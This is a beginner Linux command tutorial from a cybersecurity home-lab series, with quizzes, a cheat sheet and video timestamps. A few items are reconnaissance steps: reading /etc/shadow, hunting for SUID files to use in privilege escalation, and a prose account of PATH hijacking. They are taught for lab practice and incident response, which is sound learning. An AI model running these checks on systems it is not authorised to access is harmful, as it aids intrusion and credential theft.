Part 2 of the Drillerbyte Cybersecurity Home Lab Series

If you followed Part 1, you have a Kali Linux virtual machine running on your computer right now. But a VM without knowing how to use it is like owning a car and sitting in the passenger seat.

This guide fixes that.

By the time you finish this post, you will be able to navigate a Linux system confidently, manage files and folders, handle user accounts and permissions, understand networking from the terminal, and use Linux the way it is actually used in IT support, SOC analysis, and cybersecurity roles. No fluff. No filler. Just the commands that matter, explained in plain English, with hands-on practice exercises at the end of every section.

This is the guide I wish existed when I was starting out.

What Is Linux and Why Does It Matter?
The Terminal: Your New Best Friend
Section 1: Getting Help — The man Command
Section 2: Navigation — Moving Around the File System
Section 3: Working With Files and Folders
Section 4: Viewing and Reading File Content
Section 5: File Permissions — Who Can Do What
Section 6: Users and Groups — Why They Exist and How to Manage Them
Section 7: Processes — What Is Running on Your System
Section 8: Networking Commands
Section 9: Package Management — Installing and Removing Software
Section 10: Essential Linux Commands for Cybersecurity Professionals
Quick Reference Cheat Sheet
Video Timestamps

What Is Linux and Why Does It Matter? {#what-is-linux}

Linux is an operating system, just like Windows or macOS. The difference is that Linux is open source, meaning anyone can read the code, modify it, and distribute their own version of it. Those versions are called distributions, or distros. Kali Linux, Ubuntu, CentOS, and Debian are all Linux distros.

Here is why you need to care about Linux:

Almost every server on the internet runs Linux. When you are doing penetration testing, threat hunting, or incident response, you are almost always dealing with a Linux-based target or tool.
The best cybersecurity tools, including Nmap, Metasploit, Wireshark, and Splunk, are built to run natively on Linux.
SOC analysts, cloud engineers, and sysadmins work in Linux environments every single day. Knowing Linux is not optional in these roles.
Cloud platforms like AWS, Azure, and GCP rely heavily on Linux-based infrastructure. Any cloud security work requires Linux literacy.

The short version: if you want to work in tech, you need to know Linux. This guide will get you there.

Important: Linux is case-sensitive. The folder Documents and the folder documents are completely different. Type every command exactly as shown or it will not work.

The Terminal: Your New Best Friend {#the-terminal}

The terminal, also called the command line or shell, is a text-based way to interact with your operating system. Instead of clicking icons, you type commands.

On your Kali Linux VM, open the terminal by clicking the terminal icon in the taskbar, or right-click the desktop and select Open Terminal Here.

When it opens, you will see something like this:

kali@kali:~$

Breaking this down:

kali is your username
@kali is your machine name (hostname)
~ is your current location (~ always means your home directory)
$ means you are a regular user (if it shows #, you are root — the most powerful account on the system)

Everything you type goes after the $. Let us start from the beginning.

Section 1: Getting Help — The `man` Command {#man-command}

Before learning anything else, you need to know how to look things up when you are stuck. That tool is man, short for manual.

man ls

This opens the full manual page for the ls command. You will see a description of the command, every available option, and examples. Use the arrow keys to scroll. Press q to quit and return to your terminal.

man pwd
man cp
man grep

You can run man on virtually any Linux command. This is how professional Linux users look things up. Not always Google. man first.

For a shorter, faster summary:

ls --help
cp --help

The --help flag prints a condensed list of options directly in the terminal without opening a separate manual page.

For when you do not know which command you need at all:

apropos network

This searches manual pages for every command related to a keyword. Think of it as a keyword search across the entire Linux documentation system.

Quick Tip: If a command output is too long and scrolls past the screen, pipe it into less like this: man ls | less. You can scroll at your own pace and press q to exit.

Section 1 Practice Quiz

Question 1: You want to read the manual for the chmod command. What do you type?

Question 2: You want a quick list of options for the grep command without opening the full manual. What flag do you add?

Question 3: You are trying to find a command related to “password” but you do not know its name. Which command would help you find it?

Answers: 1) man chmod 2) grep --help 3) apropos password

Section 2: Navigation — Moving Around the File System {#navigation}

The Linux file system is a tree of folders and files starting from the very top, which is called the root directory and represented by a single forward slash /.

Here is a simplified version of what that tree looks like:

/
├── home/        (user home directories live here)
├── etc/         (system configuration files)
├── var/         (logs and variable data)
├── tmp/         (temporary files)
├── usr/         (user programs and utilities)
├── bin/         (essential system commands)
└── root/        (home directory for the root user only)

Every file on your system has an absolute path starting from /, for example /home/kali/Documents/notes.txt. There is also a relative path, which is based on where you currently are, for example just Documents/notes.txt if you are already inside /home/kali.

The Core Navigation Commands

pwd — Print Working Directory

Shows you exactly where you are right now.

pwd

Output example:

/home/kali

Never feel lost in the terminal. When in doubt, pwd.

ls — List Directory Contents

Shows what files and folders are in the current location.

ls

With useful options:

ls -l       # Long format: shows permissions, owner, size, date
ls -a       # Shows hidden files (files starting with a dot)
ls -la      # Combines both: long format AND hidden files
ls -lh      # Long format with human-readable file sizes (KB, MB, GB)

Hidden files in Linux are not hidden for security, they are just configuration files that would clutter your view. They always start with a . such as .bashrc or .ssh.

cd — Change Directory

Moves you into a different folder.

cd Documents          # Move into the Documents folder
cd /etc               # Move to the absolute path /etc
cd ..                 # Go up one level (to the parent folder)
cd ../..              # Go up two levels
cd ~                  # Go directly to your home directory
cd -                  # Go back to the previous directory you were in

Practice this sequence right now in your terminal:

pwd                   # See where you are
cd /etc               # Move to /etc
ls                    # See what is in there
cd ..                 # Go back up one level
pwd                   # Confirm you are back at /
cd ~                  # Go home
pwd                   # Confirm: should show /home/kali

tree — Visualise Folder Structure

Shows a folder and everything inside it in a tree diagram. Extremely useful for understanding how files are organised.

tree
tree -L 2             # Limit depth to 2 levels

If tree is not installed, run sudo apt install tree to get it.

Quick Tip: Tab completion is one of the most important habits to build. Start typing a folder name and press the Tab key. Linux will autocomplete it. This saves time and prevents typos. For example, type cd Doc and press Tab and it will complete to cd Documents/.

Section 2 Practice Quiz

Question 1: You are deep inside /var/log/apache2/ and want to go back to your home directory in a single command. What do you type?

Question 2: You want to list all files in your current directory, including hidden ones, in long format. What command do you use?

Question 3: What is the difference between cd .. and cd /?

Question 4: You want to know your current location in the file system. What command do you type?

Answers: 1) cd ~ 2) ls -la 3) cd .. moves you up one level from where you are; cd / takes you all the way to the root of the entire file system 4) pwd

Section 3: Working With Files and Folders {#files-and-folders}

Now you can navigate the file system. The next skill is creating, copying, moving, and deleting files and folders.

Creating Files and Folders

touch — Create an Empty File

touch notes.txt
touch report.txt scan_results.txt    # Create multiple files at once

touch creates an empty file. If the file already exists, it updates the file’s timestamp without changing its content.

mkdir — Make a Directory (Folder)

mkdir projects
mkdir -p projects/lab1/scans         # Create nested folders in one command

The -p flag (parents) is essential when you want to create a folder and its parent folders all at once. Without -p, Linux would return an error if projects or lab1 did not already exist.

Copying and Moving

cp — Copy Files or Folders

cp notes.txt backup.txt              # Copy a file and give the copy a new name
cp notes.txt /home/kali/Documents/   # Copy a file to a different folder
cp -r projects/ projects_backup/     # Copy an entire folder and its contents

The -r flag stands for recursive. You always need it when copying folders, because folders contain other things inside them.

mv — Move or Rename

mv notes.txt Documents/              # Move a file to the Documents folder
mv notes.txt important_notes.txt     # Rename a file (same folder, new name)
mv projects/ /tmp/old_projects/      # Move an entire folder

mv does two things: it moves and it renames. If the destination is a different folder, it moves. If the destination is just a new name in the same folder, it renames.

Deleting Files and Folders

rm — Remove Files

rm notes.txt                         # Delete a file
rm -i notes.txt                      # Ask for confirmation before deleting
rm file1.txt file2.txt file3.txt     # Delete multiple files at once

Warning: Linux does not have a Recycle Bin. When you rm something, it is gone. There is no undo. This is one of the most important things to know as a beginner. Always double-check before you run rm.

rm -r and rm -rf — Remove Folders

rm -r old_projects/                  # Delete a folder and everything in it
rm -rf /tmp/junk/                    # Force delete without any prompts

The f flag stands for force. It skips all confirmation prompts. Use rm -rf with extreme caution. A misplaced space in the wrong directory has wiped entire systems before.

rmdir — Remove an Empty Directory

rmdir empty_folder/

This only works if the folder is completely empty. Safer than rm -r for that reason.

Wildcards: Working With Multiple Files at Once

Wildcards let you match multiple files using patterns.

rm *.txt                             # Delete every file ending in .txt
ls *.log                             # List every file ending in .log
cp report_*.csv /backup/             # Copy every file starting with report_

The * character means “match anything.” *.txt means “any filename that ends in .txt.”

Section 3 Practice Quiz

Question 1: Create a folder called cyberlab inside your home directory. Inside it, create two empty files called targets.txt and notes.txt. Write out the three commands you would use.

Question 2: You want to copy the entire cyberlab folder to /tmp/. What command do you use?

Question 3: What is the difference between rm and rm -r?

Question 4: You accidentally created a file called reprot.txt instead of report.txt. How do you fix this without deleting and recreating the file?

Answers: 1) mkdir cyberlab then touch cyberlab/targets.txt then touch cyberlab/notes.txt 2) cp -r cyberlab/ /tmp/ 3) rm only deletes single files; rm -r deletes folders and everything inside them 4) mv reprot.txt report.txt

Section 4: Viewing and Reading File Content {#viewing-files}

Creating files is one thing. Reading their contents is another. Linux gives you several tools for this, each suited to different situations.

cat — Print the Entire File

cat notes.txt

cat dumps the entire file content to the terminal. Great for short files. Not ideal for files with hundreds of lines because everything scrolls past at once.

less — Read Long Files Page by Page

less /etc/passwd

less opens the file in a scrollable viewer. Use arrow keys or Page Up/Down to navigate. Press q to exit. This is the correct way to read long log files or configuration files.

head and tail — Read the Beginning or End of a File

head notes.txt              # Show the first 10 lines
head -20 notes.txt          # Show the first 20 lines
tail notes.txt              # Show the last 10 lines
tail -50 /var/log/syslog    # Show the last 50 lines of a log file

tail is especially important for reading logs. System logs are constantly being written to, and the newest entries are always at the bottom.

tail -f — Follow a Live Log File

tail -f /var/log/syslog

The -f flag stands for follow. This command keeps the file open and prints new lines as they are written in real time. This is how you monitor a live system. Press Ctrl+C to stop following.

grep — Search Inside Files

grep "failed" /var/log/auth.log
grep -i "error" application.log      # -i makes the search case-insensitive
grep -r "password" /etc/             # -r searches recursively through all files in a folder
grep -n "root" /etc/passwd           # -n shows the line number of each match

grep is one of the most powerful and frequently used commands in Linux. In a SOC role, you will use it constantly to search through logs for specific events, usernames, IP addresses, or error messages.

wc — Word and Line Count

wc -l /etc/passwd          # Count the number of lines in a file
wc -w notes.txt            # Count words
wc -c report.txt           # Count characters (bytes)

Useful for quickly checking how many entries are in a log or how large a file is.

find — Locate Files Anywhere on the System

find /home -name "*.txt"              # Find all .txt files in /home
find / -name "passwd"                 # Find a file called passwd anywhere
find /tmp -type f -newer /etc/passwd  # Find files in /tmp newer than /etc/passwd
find / -perm /4000 2>/dev/null        # Find SUID files (important for security)

find is a powerful search tool. In cybersecurity, it is commonly used during privilege escalation exercises and forensic investigations to locate specific files or files with unusual permissions.

Quick Tip: The 2>/dev/null part at the end of some find commands hides permission-denied errors from cluttering your output. The 2> redirects error messages (stderr) to /dev/null, which is essentially a black hole that discards everything sent to it.

Section 4 Practice Quiz

Question 1: You want to check the last 30 lines of /var/log/auth.log. What command do you use?

Question 2: You want to monitor a log file live as new events come in. Which command and flag do you use?

Question 3: You want to search the file /etc/passwd for any line containing the word “kali”. What command do you type?

Question 4: What is the difference between cat and less?

Answers: 1) tail -30 /var/log/auth.log 2) tail -f followed by the file path 3) grep "kali" /etc/passwd 4) cat prints everything at once; less opens a scrollable viewer, making it much better for long files

Section 5: File Permissions — Who Can Do What {#permissions}

Permissions are one of the most important concepts in Linux. They control exactly who is allowed to read, write, or run every file and folder on the system. Understanding permissions is essential for both system administration and cybersecurity.

Reading Permission Output

Run ls -l and you will see something like this:

-rwxr-xr-- 1 kali kali 4096 May 21 10:32 script.sh

Let us break that down piece by piece:

- rwx r-x r--
│  │   │   │
│  │   │   └── Other (everyone else): read only
│  │   └────── Group: read and execute
│  └────────── Owner: read, write, and execute
└───────────── File type: - means file, d means directory

The three permission sets always appear in this order: Owner, Group, Other.

Each set uses three characters:

r = read (can view the file’s contents)
w = write (can modify or delete the file)
x = execute (can run the file as a program)
- = that permission is not granted

Changing Permissions with `chmod`

Symbolic method (easier to read):

chmod u+x script.sh          # Give the owner execute permission
chmod g-w file.txt           # Remove write permission from the group
chmod o+r report.txt         # Give others read permission
chmod a+x script.sh          # Give everyone execute permission (a = all)

The letters:

u = user (owner)
g = group
o = other
a = all three

Numeric (octal) method (faster once you know it):

Each permission has a numeric value:

r = 4
w = 2
x = 1

You add these numbers together for each group:

chmod 755 script.sh    # Owner: 7 (rwx), Group: 5 (r-x), Other: 5 (r-x)
chmod 644 file.txt     # Owner: 6 (rw-), Group: 4 (r--), Other: 4 (r--)
chmod 600 private.key  # Owner: 6 (rw-), Group: 0 (---), Other: 0 (---)
chmod 777 shared.txt   # Everyone can read, write, and execute

Common permission values you will see frequently:

755 is standard for executable scripts and programs
644 is standard for regular files
600 is for sensitive files like private keys (only the owner can read them)
777 means everyone has full access (use with caution, rarely appropriate)

Changing Ownership with `chown`

chown alice file.txt               # Change owner to alice
chown alice:developers file.txt    # Change owner to alice and group to developers
chown -R alice /home/alice/        # Recursively change ownership of a folder
sudo chown root:root /etc/hosts    # Give root ownership (requires sudo)

What is `sudo`?

sudo stands for “superuser do.” It lets a regular user run a single command with root (administrator) privileges without fully switching to the root account.

sudo apt update                    # Run apt update as root
sudo chmod 600 /etc/secret.conf    # Change permissions on a system file

You will be prompted for your password the first time you use sudo in a session. After that, it remembers for a few minutes.

Security Note: In a real production environment, file permissions matter enormously. Weak permissions on sensitive files like SSH keys, configuration files, or password databases are a common entry point attackers look for during penetration tests. Setting chmod 600 on private keys is not optional. It is standard practice.

Section 5 Practice Quiz

Question 1: What does the permission string rwxr-xr-- mean in plain English for each of the three groups?

Question 2: You have a script called run.sh. You want only the owner to be able to read, write, and execute it, and no one else to have any access at all. What chmod command do you use?

Question 3: You want to change the owner of a file called config.txt to a user named bob. What command do you use?

Question 4: What is the numeric value of rw-r--r--?

Answers: 1) Owner can read, write, execute; group can read and execute; others can only read 2) chmod 700 run.sh 3) chown bob config.txt 4) 644

Section 6: Users and Groups — Why They Exist and How to Manage Them {#users-and-groups}

Why User Accounts Matter

Every person or process that interacts with a Linux system does so through a user account. This is not just an administrative convenience. It is a security boundary.

If every user shared the same account, a compromised account would mean full access to everything. By separating users, Linux ensures that each person or process only has access to what they specifically need. This is the principle of least privilege, and it is foundational to cybersecurity.

The Key Account Files

Linux stores user and authentication information in three files. You will encounter all three in your career:

cat /etc/passwd      # Stores basic user account information
cat /etc/shadow      # Stores hashed passwords (requires root to read)
cat /etc/group       # Stores group memberships

The /etc/passwd file format looks like this:

kali:x:1000:1000:Kali,,,:/home/kali:/bin/bash

From left to right, separated by colons:

Username: kali
Password placeholder: x (actual hash is in /etc/shadow)
User ID (UID): 1000
Group ID (GID): 1000
Comment/Full name: Kali,,,
Home directory: /home/kali
Default shell: /bin/bash

Creating a New User

sudo useradd analyst                          # Create a basic user
sudo useradd -m analyst                       # Create a user and their home directory
sudo useradd -m -s /bin/bash -c "SOC Analyst" analyst    # Full creation with shell and comment
sudo passwd analyst                           # Set a password for the user

The -m flag creates the home directory at /home/analyst. Without it, no home folder is created. The -s flag sets the default shell. Always use -m when creating real user accounts.

Modifying a User

sudo usermod -aG sudo analyst                 # Add analyst to the sudo group
sudo usermod -aG developers,security analyst  # Add to multiple groups
sudo usermod -s /bin/bash analyst             # Change the user's shell
sudo usermod -l newname analyst               # Rename the account

The -aG flag means “append to group.” The a is critical. Without it, running usermod -G sudo analyst would replace all existing group memberships with just sudo, removing the user from every other group they belonged to.

Deleting a User

sudo userdel analyst                          # Remove the account (keeps home folder)
sudo userdel -r analyst                       # Remove account AND home directory

In a real environment, you typically do not delete accounts immediately. You disable them first, retain the home directory for forensics if needed, then delete after a set period. But in a lab, userdel -r is fine.

Working With Groups

sudo groupadd security                        # Create a new group
sudo groupadd -g 1500 security               # Create a group with a specific group ID
sudo groupdel security                        # Delete a group
groups analyst                               # Show all groups a user belongs to
id analyst                                   # Show UID, GID, and all group memberships

Switching Users

su analyst                    # Switch to another user (requires their password)
su -                          # Switch to root (requires root password)
sudo su                       # Switch to root using your own sudo password
whoami                        # Confirm which user you currently are
id                            # Show your current UID, GID, and groups

SOC Relevance: Suspicious user creation is a major red flag in security monitoring. When an attacker gains access to a system, one of the first things they do is create a backdoor account. Knowing how to list users with cat /etc/passwd, search for recently created accounts, and cross-reference group memberships is a core skill for incident response.

Section 6 Practice Quiz

Question 1: Create a user called trainee with a home directory and the bash shell. Write the full command.

Question 2: After creating trainee, you want to add them to the sudo group. What command do you use, and why is the -a flag important?

Question 3: Which file contains hashed passwords, and what permission level do you need to read it?

Question 4: You run whoami and it returns trainee. How do you switch to the kali user?

Answers: 1) sudo useradd -m -s /bin/bash trainee then sudo passwd trainee 2) sudo usermod -aG sudo trainee. The -a flag appends the group rather than replacing all existing groups 3) /etc/shadow, requires root access 4) su kali and enter kali’s password, or su - kali

Section 7: Processes — What Is Running on Your System {#processes}

Every program running on your Linux system is a process. Each process has a unique PID (Process ID). Knowing how to view and manage processes is critical for both sysadmins and security analysts.

ps — Snapshot of Current Processes

ps                          # Show processes in your current terminal session
ps aux                      # Show ALL running processes for ALL users
ps aux | grep apache        # Find a specific process by name

The output of ps aux includes:

USER: who is running the process
PID: the process ID
%CPU and %MEM: resource usage
COMMAND: what program is running

top — Live Process Monitor

top

top gives you a real-time, updating view of all running processes sorted by CPU usage. Press q to exit, k to kill a process by PID, M to sort by memory usage.

htop — A Better Version of top

htop

htop is a more user-friendly, colour-coded version of top. If it is not installed: sudo apt install htop. Use arrow keys to select a process, press F9 to send it a signal, or press F10 to quit.

kill — Stop a Process

kill 1234                   # Send a termination signal to process 1234
kill -9 1234                # Force kill: immediately terminate, no cleanup
killall firefox             # Kill every process named firefox

The -9 flag sends SIGKILL, which cannot be ignored by the process. Use it when a normal kill does not work.

jobs, bg, fg — Foreground and Background

ping google.com &           # The & runs a command in the background
jobs                        # List all background jobs
fg 1                        # Bring job 1 to the foreground
bg 1                        # Resume a paused job in the background

Press Ctrl+Z to pause (suspend) a running process. Then use bg to resume it in the background or fg to bring it back to the foreground.

Security Relevance: During an incident response investigation, reviewing running processes is one of the first things an analyst does. Unusual process names, processes running as root that should not be, or processes communicating on unexpected ports are all indicators of compromise. ps aux combined with grep and netstat is a fundamental part of the triage workflow.

Section 7 Practice Quiz

Question 1: You want to see all running processes on the system, from all users, with CPU and memory usage. What command do you use?

Question 2: A process with PID 4521 is hanging and not responding to a normal kill signal. How do you force-terminate it?

Question 3: You start a long-running command and want it to keep running while you do other things in the same terminal. What character do you add at the end of the command?

Answers: 1) ps aux 2) kill -9 4521 3) The & character, for example nmap 192.168.1.0/24 &

Section 8: Networking Commands {#networking}

Linux has a full toolkit for network configuration, testing, and analysis. These commands are used daily in sysadmin, networking, and cybersecurity roles.

ip a — Show Network Interfaces and IP Addresses

ip a
ip a show eth0              # Show details for a specific interface

This is the modern replacement for the older ifconfig command. Run ip a on your Kali VM right now and look for the eth0 interface. That is your main network adapter and where your IP address will be listed.

ip r — Show the Routing Table

ip r

Shows how your system routes traffic. Useful for confirming that your network adapters are configured correctly, which was covered in Part 1 of this series.

ping — Test Connectivity

ping google.com                     # Send packets to google.com continuously
ping -c 4 google.com                # Send exactly 4 packets then stop
ping 192.168.1.1                    # Ping a local IP address

ping sends ICMP echo request packets to a destination. If you get replies, the destination is reachable. If you get “Destination Host Unreachable” or no response, there is a connectivity problem.

netstat and ss — Active Connections and Listening Ports

ss -tuln                    # Show all listening TCP and UDP ports
ss -tulnp                   # Same but also show the process using each port
netstat -tuln               # Older equivalent (may need net-tools: sudo apt install net-tools)

In a security context, checking listening ports is how you discover which services are running and whether any unexpected ports are open. This is a fundamental step in both hardening a system and investigating a compromise.

nslookup and dig — DNS Lookups

nslookup google.com                     # Simple DNS lookup
dig google.com                          # Detailed DNS lookup
dig google.com MX                       # Look up mail server records
dig @8.8.8.8 drillerbyte.com            # Query a specific DNS server

DNS translates domain names to IP addresses. These tools are essential in threat intelligence and phishing investigations when you need to trace where a domain resolves to, who owns it, or which mail servers it uses.

traceroute — Trace the Network Path

traceroute google.com

Shows every hop between your machine and a destination. Useful for diagnosing where in the network a connection is failing.

curl and wget — Download and Test HTTP

curl https://example.com                    # Fetch a web page and print it to terminal
curl -I https://example.com                 # Fetch only the HTTP headers
wget https://example.com/file.zip          # Download a file
wget -q https://example.com/file.zip       # Download quietly (no progress output)

curl and wget are used constantly for downloading tools, testing web applications, and interacting with APIs from the terminal.

hostname — Show or Set the Machine Name

hostname                    # Show the current hostname
hostname -I                 # Show all IP addresses assigned to this machine

Networking Quick Win: On your Kali VM, run ip a right now and note down your IP address. Then open a terminal on your Windows host and run ping [kali-ip]. If you get replies, your bridged adapter from Part 1 is working correctly. This is a basic but important connectivity verification.

Section 8 Practice Quiz

Question 1: What command shows you all listening ports and the processes using them?

Question 2: You want to test whether your Kali VM can reach Google’s DNS server at 8.8.8.8. What command do you use, and how do you limit it to exactly 4 packets?

Question 3: What is the difference between curl and wget?

Question 4: You want to look up the IP address for drillerbyte.com. Which two commands could you use?

Answers: 1) ss -tulnp 2) ping -c 4 8.8.8.8 3) curl outputs content to the terminal and is used for testing and API interaction; wget is used for downloading files 4) nslookup drillerbyte.com or dig drillerbyte.com

Section 9: Package Management — Installing and Removing Software {#package-management}

On Linux, software is installed via package managers rather than downloading .exe files. Kali Linux and Ubuntu both use APT (Advanced Package Tool).

apt update — Refresh the Package List

sudo apt update

This does not install or upgrade anything. It just fetches the latest list of available packages from the repositories. Always run this before installing anything.

apt upgrade — Apply Available Updates

sudo apt upgrade
sudo apt full-upgrade              # Includes kernel and dependency updates

apt install — Install a Package

sudo apt install nmap
sudo apt install htop tree net-tools    # Install multiple packages at once
sudo apt install -y nmap               # The -y flag auto-confirms without prompting

apt remove and apt purge — Uninstall Software

sudo apt remove nmap               # Remove the program but keep config files
sudo apt purge nmap                # Remove the program AND its configuration files
sudo apt autoremove                # Remove packages that are no longer needed

apt search — Find a Package

apt search wireshark
apt show nmap                      # Show detailed info about a specific package

dpkg — Low-Level Package Tool

dpkg -l                            # List all installed packages
dpkg -l | grep nmap                # Check if a specific package is installed
sudo dpkg -i package.deb           # Install a downloaded .deb file manually

Quick Tip: If you ever download a tool directly as a .deb file rather than from the package manager (which sometimes happens with third-party security tools), use sudo dpkg -i filename.deb to install it.

Section 9 Practice Quiz

Question 1: What is the correct order of commands before installing a new package? Why does the order matter?

Question 2: You want to install wireshark and automatically say yes to all prompts. What command do you use?

Question 3: What is the difference between apt remove and apt purge?

Answers: 1) sudo apt update first, then sudo apt install. The update refreshes the available package list so you install the latest version, not a cached old one 2) sudo apt install -y wireshark 3) apt remove keeps configuration files; apt purge removes everything including configs. Use purge for a clean uninstall

Section 10: Essential Linux Commands for Cybersecurity Professionals {#cybersecurity-commands}

This section covers the commands that come up constantly in real security work. If you are aiming for a SOC analyst, penetration tester, or IT security role, these are your bread and butter.

Log Analysis

System logs are your primary evidence source during an incident. On Linux, the key log files are:

/var/log/syslog          # General system messages
/var/log/auth.log        # Authentication events: logins, sudo, SSH
/var/log/kern.log        # Kernel messages
/var/log/apache2/        # Web server access and error logs (if Apache is running)
/var/log/ufw.log         # Firewall logs (if UFW is enabled)

Commands you will use constantly:

tail -f /var/log/auth.log                          # Watch logins in real time
grep "Failed password" /var/log/auth.log           # Find failed login attempts
grep "Accepted password" /var/log/auth.log         # Find successful logins
grep "sudo" /var/log/auth.log                      # Find sudo usage
grep "Invalid user" /var/log/auth.log | awk '{print $8}' | sort | uniq -c | sort -rn
# Count failed login attempts per username

`awk` — Extract Specific Columns from Output

ps aux | awk '{print $1, $2, $11}'      # Print user, PID, and command only
cat /etc/passwd | awk -F: '{print $1}'  # Print only usernames from /etc/passwd

awk lets you extract specific fields from structured output. The -F: sets the delimiter (colon in this case).

`sed` — Find and Replace in Text

sed 's/old_text/new_text/g' file.txt              # Replace all occurrences
sed -i 's/old_text/new_text/g' file.txt           # Edit the file in place
grep "error" app.log | sed 's/error/ERROR/g'      # Pipe grep output through sed

Pipes and Redirection: Combining Commands

The pipe | takes the output of one command and feeds it as input to the next. This is how you build powerful one-liners.

ps aux | grep nginx                               # Filter process list for nginx
cat /etc/passwd | grep -v "nologin" | awk -F: '{print $1}'
# List users who have a real shell (not service accounts)

ls -la | sort -k5 -n                             # List files sorted by size

Redirection sends output to a file instead of the terminal:

ps aux > running_processes.txt                   # Save output to a file (overwrite)
echo "scan started" >> scan_log.txt              # Append a line to a file
nmap 192.168.1.0/24 2>&1 | tee nmap_output.txt  # Save AND display output at the same time

Hashing Files

File hashing is used in malware analysis, digital forensics, and integrity verification:

md5sum suspicious_file.exe
sha256sum malware_sample.bin
sha1sum document.pdf

When you download a tool, always compare the hash from the official website against the hash of the file you downloaded. If they do not match, the file was tampered with.

Checking Open Connections (Threat Hunting)

ss -tulnp                                        # All listening ports with process names
ss -tp                                           # All established TCP connections
netstat -anp | grep ESTABLISHED                  # Established connections (if net-tools installed)
lsof -i :80                                      # What process is using port 80
lsof -i -n -P                                    # All open network connections with IPs

In threat hunting, you compare the baseline of what should be listening on a system against what you actually see. Anything unexpected is a lead.

Checking SUID/SGID Files (Privilege Escalation)

find / -perm /4000 2>/dev/null                   # Find all SUID files
find / -perm /2000 2>/dev/null                   # Find all SGID files
find / -perm /6000 2>/dev/null                   # Find both

SUID (Set User ID) files run with the permissions of the file owner rather than the user who launched them. If a SUID file owned by root contains a vulnerability, it can be exploited to gain root access. This is a standard check in penetration testing.

Cron Jobs — Scheduled Tasks

crontab -l                                       # List your current cron jobs
sudo crontab -l                                  # List root's cron jobs
cat /etc/crontab                                 # System-wide cron jobs
ls /etc/cron.d/                                  # Additional cron job files
ls /etc/cron.daily/ /etc/cron.weekly/            # Scheduled system maintenance tasks

Attackers frequently use cron jobs for persistence, scheduling a backdoor to run every minute. Reviewing scheduled tasks is a standard part of incident response.

Environment Variables

env                                              # Print all environment variables
echo $PATH                                       # Show where Linux looks for commands
echo $HOME                                       # Show your home directory
export MY_VAR="hello"                            # Set a temporary variable

The $PATH variable is particularly relevant in security. It defines where the system looks for executables. PATH hijacking is a privilege escalation technique where an attacker places a malicious file with the same name as a legitimate command in a directory that is searched before the real one.

Section 10 Practice Quiz

Question 1: You are investigating a potential compromise on a Linux server. Write a command to find all failed SSH login attempts in /var/log/auth.log.

Question 2: You want to find every SUID file on the system. What command do you use, and why are SUID files significant in security?

Question 3: You have run nmap 192.168.1.0/24 and want to save the output to a file called scan.txt while also seeing it on screen. What command do you use?

Question 4: You want to list all users on the system who have a real shell (i.e., are not service accounts with /usr/sbin/nologin). Write a command using pipes.

Answers: 1) grep "Failed password" /var/log/auth.log 2) find / -perm /4000 2>/dev/null. SUID files run as their owner rather than the user who launched them, which can be exploited for privilege escalation if misconfigured 3) nmap 192.168.1.0/24 | tee scan.txt 4) cat /etc/passwd | grep -v "nologin" or more precisely cat /etc/passwd | grep -v "nologin" | grep -v "false" | awk -F: '{print $1}'

Quick Reference Cheat Sheet {#cheat-sheet}

Navigation

Command	What It Does
`pwd`	Show current directory
`ls -la`	List all files including hidden, long format
`cd /path`	Navigate to an absolute path
`cd ~`	Go to home directory
`cd ..`	Go up one level
`tree -L 2`	Show folder structure, 2 levels deep

Files and Folders

Command	What It Does
`touch file.txt`	Create an empty file
`mkdir -p a/b/c`	Create nested folders
`cp -r src/ dst/`	Copy folder recursively
`mv file.txt new.txt`	Rename or move a file
`rm -r folder/`	Delete a folder and contents
`find / -name "file"`	Find a file by name

Viewing Files

Command	What It Does
`cat file.txt`	Print file to terminal
`less file.txt`	Scroll through a file
`head -20 file.txt`	First 20 lines
`tail -f /var/log/syslog`	Follow a live log
`grep "term" file.txt`	Search inside a file
`wc -l file.txt`	Count lines in a file

Permissions

Command	What It Does
`chmod 755 script.sh`	Standard executable permissions
`chmod 600 key.pem`	Private file, owner only
`chown user:group file`	Change owner and group
`sudo command`	Run as root

Users

Command	What It Does
`whoami`	Current username
`id`	Full UID, GID, groups
`sudo useradd -m -s /bin/bash user`	Create a user
`sudo passwd user`	Set a password
`sudo usermod -aG sudo user`	Add to sudo group
`sudo userdel -r user`	Delete user and home folder

Processes

Command	What It Does
`ps aux`	All running processes
`top` or `htop`	Live process monitor
`kill -9 PID`	Force kill a process
`command &`	Run in background

Networking

Command	What It Does
`ip a`	Show IP addresses
`ping -c 4 host`	Test connectivity
`ss -tulnp`	Listening ports with processes
`dig domain.com`	DNS lookup
`curl -I https://site.com`	HTTP headers

Packages

Command	What It Does
`sudo apt update`	Refresh package list
`sudo apt install pkg`	Install a package
`sudo apt purge pkg`	Remove + delete config
`dpkg -l`	List installed packages

What’s Next in the Series

In Part 3, you will set up a full SOC environment. This means:

Installing Ubuntu Server as a second virtual machine
Deploying Splunk on Ubuntu to act as your SIEM
Generating log data from your Kali machine
Writing your first detection rules and alerts
Running a simulated attack and detecting it in Splunk

That is where everything in this guide starts to connect. The users you create, the processes you understand, and the logs you now know how to read will all feed into your SIEM and show up as events for you to investigate.

If you want to be notified when Part 3 drops, subscribe to the channel and hit the bell.

Quick Links

Watch Part 1: How to Build a Cybersecurity Home Lab
Download Kali Linux
Linux Man Pages Online
OverTheWire: Bandit — A free, browser-based Linux wargame perfect for practicing everything in this guide
TryHackMe Linux Rooms — Guided hands-on Linux labs for beginners

Video Timestamps {#timestamps}

Jump to any section in the video:

0:00 — Introduction: Why Linux Matters in Cybersecurity
0:45 — Opening the Kali Linux Terminal
1:10 — Section 1: The man Command and Getting Help
3:20 — Section 2: Navigation — pwd, ls, cd, tree
8:15 — Section 3: Working With Files — touch, mkdir, cp, mv, rm
15:40 — Section 4: Reading File Content — cat, less, head, tail, grep
23:00 — Section 5: File Permissions Explained — chmod, chown, sudo
31:30 — Section 6: Users and Groups — Creating, Modifying, Deleting Users
40:00 — Section 7: Processes — ps, top, kill
46:15 — Section 8: Networking Commands — ip a, ping, ss, dig, curl
54:20 — Section 9: Package Management — apt install, update, remove
59:00 — Section 10: Cybersecurity-Specific Commands — Logs, Hashing, SUID, Cron
1:10:00 — Final Quiz Walkthrough and Recap

If this guide helped you, share it with someone who is trying to break into cybersecurity. And if you want to support more free content like this:

Support the Channel (Buy Me a Coffee)

Linux Commands for Beginners: The Complete Hands-On Guide (Zero to Job-Ready)

Table of Contents